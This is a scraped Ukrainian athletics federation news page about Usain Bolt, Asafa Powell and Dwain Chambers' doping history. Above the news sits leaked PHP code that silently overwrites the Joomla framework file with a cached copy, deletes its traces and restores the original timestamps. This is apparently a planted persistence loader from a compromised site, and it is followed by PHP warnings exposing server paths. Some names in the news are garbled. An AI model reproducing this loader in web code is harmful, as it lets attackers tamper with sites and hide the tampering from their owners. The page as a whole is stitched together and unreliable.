$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 426
МІЖНАРОДНІ НОВИНИ | ФЕДЕРАЦІЯ ЛЕГКОЇ АТЛЕТИКИ УЖГОРОДА

 

МІЖНАРОДНІ НОВИНИ

  14 березня у ямайському місті SPANISH TOWN триразовий олімпійський чемпіон Усейн Болт у першому старті сезону пробіг стометрівку за 9,93 сек. Але за допомоги вітру + 2,25 м/сек..

На цих же змаганнях юне ямайське дарування. Рекордсмен країни серед юніорів Даніель Бейлі у другому забігу показав результат 10,08 сек 

 

Тренер ямайського спринтера Асафи Пауела Стівен Френсіс заявив австралійській пресі, що його вихованець підійде до літнього сезону у чудовій формі і буде готовий побити світовий рекорд на 100 м.

 

 

Усейн Болт збирається дати декілька уроків кращому футболісту світу 2008 року, гравцю „Манчестер Юнайтед” Кріштіану Роналду, щоб підвищити його швидкість. Тренер „МЮ” сер Апекс Фергюнсон послав Болту листа, у якому повідомив, що з великим задоволенням прийме у своєму клубі триразового олімпійського чемпіона.

 Британський спринтер Джейн Чемберс повідомив про співпрацю з лікарем віктором Конте, який у минулому давав йому заборонений препарат тетрагідрогестрінон.

Після двохрічної дискваліфікації за вживання допінгу Чемберс повернувся у спорт.

Нещодавно він встановив рекорд Європи на дистанції 60 м, виграв золоту медаль чемпіонату континента. Конте відомий як засновник фірми Bay Area Laboratory Co-operative (BALCO), яка займалася виготовленням допінгу.

„Я – людина, яка вміє вибачати. Я вибачив себе, вибачив його. Не звинувачую його ні в чому, що сталося тоді.Я розбив свою кар’єру.Зараз наші відносини з Конте носять освітянський характер. Не бачу сенсу приховувати цю інформацію. Не збираюся знову йти цією стежкою. Останній раз вживав допінг у серпні 2003 року”,- розповів бігун.

Чемберс також повідомив, що Конте порекомендував йому апарат для дихання, який підвищує кількість еритроцитів у крові, що імітує ефект тренувань у високогір’ї. Це не є забороненим WADA.

Організатори „Золотої ліги” у Берліні запросили Чемберса для участі у змаганнях.


А Британська федерація заборонила атлету виступати на чемпіонаті світу у Берліні.

Дуейну не можуть вибачити допінговий скандал. Йому також було заборонено приймати участь у Пекінській Олімпіаді. Федерація боїться, що участь Чемберса у чемпіонаті викличе додаткові підозри у WADA, адже він показав дуже високий результат у Туріні, а чиновники не можуть йому повністю довіряти.

„Якщо ти біжиш повільно. То вони кажуть, що ти сміття, якщо біжиш швидко, то це означає, що ти вживаєш допінг. Виходить замкнене коло. Я не вживаю допінг. Я отримав  чесну перемогу. „ – сказав Чемберс.

Також стало відомо, що у березні на засіданні Ради ІААФ буде обговорюватися висловлення Чемберса із його книги, де він детально розповідає про те , як він приймав допінг.

 
ГОЛОВНА НОВИНИ новини МІЖНАРОДНІ НОВИНИ
'Flauz' интернет магазин спортивного питания